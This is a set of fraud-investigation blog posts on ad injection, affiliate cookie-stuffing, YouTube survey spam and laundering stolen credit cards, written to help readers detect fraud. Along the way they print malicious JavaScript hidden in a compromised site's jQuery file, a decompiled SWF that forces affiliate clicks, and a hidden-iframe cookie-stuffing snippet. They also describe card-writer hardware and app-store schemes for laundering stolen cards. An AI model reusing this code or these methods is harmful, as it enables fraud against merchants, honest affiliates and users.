Traffic in all countries Welcome to the Internet
High quality traffic It most certainly is. This is why advertisers pay the big bucks to be in the #1 spot on Google

For publishers:

advertising-support iPensatori Comments
Very easy to implement One can’t help but wonder which publishers they are talking about here. It’s certainly not the publisher of the content (Google in our example), although if they were then it is pretty easy to implement: Google did nothing.
Non-Intrusive to users No comment
Maximized Earnings ?

Other Publishers Receiving Enhanced Ads

Google is not the only target of Bee Coupons. In order to satisfy the claims made above they have to inject ads into a number of top quality publishers. I captured a few samples below.

Twitterbee_coupons_click_fraud_6

Msnbee_coupons_click_fraud_5Youtube

bee_coupons_click_fraud_7WordPress

bee_coupons_click_fraud_8Yahoo

bee_coupons_click_fraud_9

 Enter the Affiliate

Affiliates are masters of marketing, which makes sense and in a way justifies the whole industry. A small company that is really good at putting together trips to the Amazon jungle may not know the ins and outs of online marketing, or even care to know it since their specialty is trips to the Amazon jungle so why concentrate on anything other than improving this service. As a result it is well within their interest to offload the marketing portion of their business onto affiliates in return for cutting them in on a slice of the pie when there is a sale. How wonderful!

Wonderful, that is, until a rogue affiliate enters the picture.

bee_coupons_click_fraud_4This packet trace steps us through the chain of events that happened behind the scenes upon clicking on the first Amazon advertiser provided by Bee Coupons:

  • Our adventure begins with s.txtsrving.info, a GET request with no referrer header (entity responsible for the traffic, usually the publisher) will return Javascript that will create an element in the DOM and click on it. So many reasons for doing this, one of which is to pick up a brand new referrer
  • Automated click from the JS above results in a GET request to 123srv.com with the referrer header now set to s.txtsrving.info. Response here includes JS which will redirect the browser to another script on 123srv.com
  • Response from 123srv.com redirects to advjmp.com which uses JS to redirect to Amazon via an Amazon affiliate link

Net effect is that one of Amazon’s affiliates (affiliate id advertiseco0e-20) basically out bid Amazon (with probably less money thanks to the injector) for the top spot on Google when searching for Amazon. If the user searching for Amazon clicks on this ad and then buys something from Amazon within a certain period of time (say 24 hours) then the affiliate responsible for purchasing the ad from the injector will be paid a commission.

Amazon may allow this behavior, but it seems unlikely that they do. Some simple reasons why not:

  1. Ultimately Amazon will be paying a commission on traffic that they would have received anyway, for not only were they the first ad displayed before the injector arrived, but they were the first organic link displayed as well
  2. This practice is awfully unfair to the honest Amazon affiliates out there that don’t know about ad injectors, since their cookies will be overwritten by the affiliate using the ad injector.

I’ve spent the last few years presenting at a number of affiliate conferences, meeting and shaking hands with affiliates in person, people who make affiliate marketing their primary means of making ends meet. They don’t know how to broker relationships with questionable traffic sources. They’re not programmers. They have never heard of practices the likes of referrer laundering, blackhat marketing, cookie-stuffing or pay per view marketing and they most certainly don’t know the ins and outs of ad injectors.

So if you’re an honest Amazon affiliate competing for the same traffic that this ad injector is sending to Amazon affiliate advertiseco0e-20, know this: you don’t stand a chance

Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.

Cards

I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look.

Pastebin.com is a surprising resource here. Point your browser to your favorite search engine and type in the following query:

“cvv site:pastebin.com”

The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, paypal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

United States American Express $7.00
United States Discover $8.00
United States Visa & Mastercard $4.50
Europe American Express $12.50
Europe Discover $18.00
Europe Visa & Mastercard $14.50
Asia American Express $18.00
Asia Discover $18.00
Asia Visa & Mastercard $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver it to yourself, because the goal is to launder the card as quick as you can and make a clean getaway. One way to do this is sell items at a discount on online market A, once these sell then you buy the product through online market B with the stolen card and ship to the buyer from market A. Easy.

It’s a simple scam but scammers are lazy and this sounds like too much work. Mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in and by the time it starts any meaningful income then the account on A could get closed at any time (buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605″) yields a list of auctions with card writers that are ready to roll for less than $150.

ebay-writer-0  ebay-writer-1ebay-writer-2Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card

credit card track 2 data

A scammer that is printing his/her own cards can then purchase fairly expensive and hard to track items from offline stores (jewelry) which can then be sold for sale at a discounted rate online. Since the scammer paid nothing for the items that have been purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard to track items, mitigates the risk of the scammer’s online account responsible for sales being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on their weakest links in the ecosystem

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good’ol wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

scammer hustle and flow 2

Now it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying, is why waste time with merchants and legitimate buyers when the enterprising fraudster can be both!

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up qbnews.com is going to result in a request www.52zhishi.com/v.swf which is then responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate clicks included), the Flash payload in the browser then invisibly requests each of the links and cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where does the initial request to 52zhishi.com come from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface is somewhat predictable in that like much of the technical marvels blackhats in this space, he was not the brightest bulb on the ever shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be a Jquery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires.../code>

In compromising this site, he has hidden his activities in this Jquery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF that is loaded a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends movieclip {
 
        public var loader:URLLoader;
        public var url:string;
        public var reqURL:URLRequest;
 
        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowdomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = nan;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new number(loader.data["safe"]);
            url1 = new string(loader.data["url1"]);
            url2 = new string(loader.data["url2"]);
            url3 = new string(loader.data["url3"]);
            url4 = new string(loader.data["url4"]);
            url5 = new string(loader.data["url5"]);
            url6 = new string(loader.data["url6"]);
            url7 = new string(loader.data["url7"]);
            url8 = new string(loader.data["url8"]);
            url9 = new string(loader.data["url9"]);
            url10 = new string(loader.data["url10"]);
            url11 = new string(loader.data["url11"]);
            url12 = new string(loader.data["url12"]);
            url13 = new string(loader.data["url13"]);
            url14 = new string(loader.data["url14"]);
            url15 = new string(loader.data["url15"]);
            url16 = new string(loader.data["url16"]);
            url17 = new string(loader.data["url17"]);
            url18 = new string(loader.data["url18"]);
            url19 = new string(loader.data["url19"]);
            url20 = new string(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middle men in these transactions for they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser. world of tanks affiliate fraudNote the following:

  • Commission rate of “$2.65″/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates can not encourage consumers to sign-up with the advertiser by offering rewards the likes of cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):
world-of-tanks-2Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser, the screenshot below shows the result.

world of tanks affiliate fraud This is what’s going on in the packet trace:

  1. Subscriber in the online forum decides he wants the $0.40 on offer in the online form
  2. He/she starts the task by navigating to http://tinyurl.com/olghhz7
  3. Tinyurl redirects to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154 which then uses Javascript and an HTML form to redirect the browser to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ (this essentially launders the referrer)
  4. http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ sets up a full screen iframe which contains www.mb57.com which redirects to the following affiliate click URL: www.maxbounty.com/lnk.asp?o=5572&amp;c=63867&amp;a=105565&amp;s1=tanks
  5. This URl redirects to track.popmog.com which redirects to worldoftanks.com

So what you have here is an affiliate taking advantage of a price differentiation in two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 and sell $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).

YouTube Spam

By Wesley Brandi in CPL | Spam - (1 Comment)

Spend some time on YouTube and you may run into comments like

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following :

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a set of tainted comments (T); We consider a set of comments to be tainted when it contains spam. Having defined a function to determine if a set is tainted, we then get an idea of the scope of this problem by dividing T into N”

Of course, it doesn’t take into account the rank of each spammy comment, but that’s why this is called a naive approach.

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we try to get a rough idea of how much of a problem this is by taking a look at only the default page presented when visiting youtube.com. This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013

youtube spam sample setThere are 40 videos presented on the front page. If you’re going to try this for yourself at home, then you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:

youtube spam comment

For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:youtube spam

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health so how do they make their money?

Consider the comment on the first highlighted video presented:

youtube_spam_comment_1

This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page: goo.gl\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse goo.gl/nb1Bak in a browser:

  • goo.gl is Google’s URL Shortener.
  • goo.gl\nb1Bak redirects to 78.154.146.129/~leechtv/paidsurveys/?7 which redirects to trk.surveyjunkie.com/srd/klenzxcp
  • This then redirects to www.surveyjunkie.com

“So surveyjunkie.com is the spammer?”

No, surveyjunkie.com is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’), he is paid a finder’s fee when YouTube users sign up with surveyjunkie.com.

Now this may or may not violate surveyjunkie’s acceptable terms, although I could not find a policy detailing these terms. Of interest from the packet trace is that the Web request through to trk.surveyjunkie.com does not contain a referrer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to surveyjunkie.com via two affiliates (klenzxcp and gqrzv5sx):

youtube spam leads to surveyjunkieModus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his weight will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5

youtube pva accounts

  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comment’s section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non PVA) YouTube accounts for $5

buy youtube  accounts

  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of set A and B.

“It’s all out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments, is that the same comment after being taken down will quickly make its way back to the top. I’d make a bet that there’s low hanging fruit to be had here by combining user feedback on tainted comments with a unique hash on the comment itself. In doing so one could block the comment at the front door.

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason for this is because Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on wirelesscouponcode.com, casual inspection yields nothing out of the ordinary.

affiliate fraud

Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

<iframe 
 src="http://click.linksynergy.com/fs-bin/click?id=smaqEgQUEvQ&offerid=222015.10000603&subid=0&type=4" 
 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">
</iframe>

This is HTML that will invisibly load the affiliate click link and in turn the merchant that it  routes through to (resulting in applicable cookies pushed onto the user’s machine), in this case it is att.com . I dynamically modified the page to show the att.com page that was hidden, follow the red arrow below

wirelesscouponcode_affiliate_fraud_1

 

As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing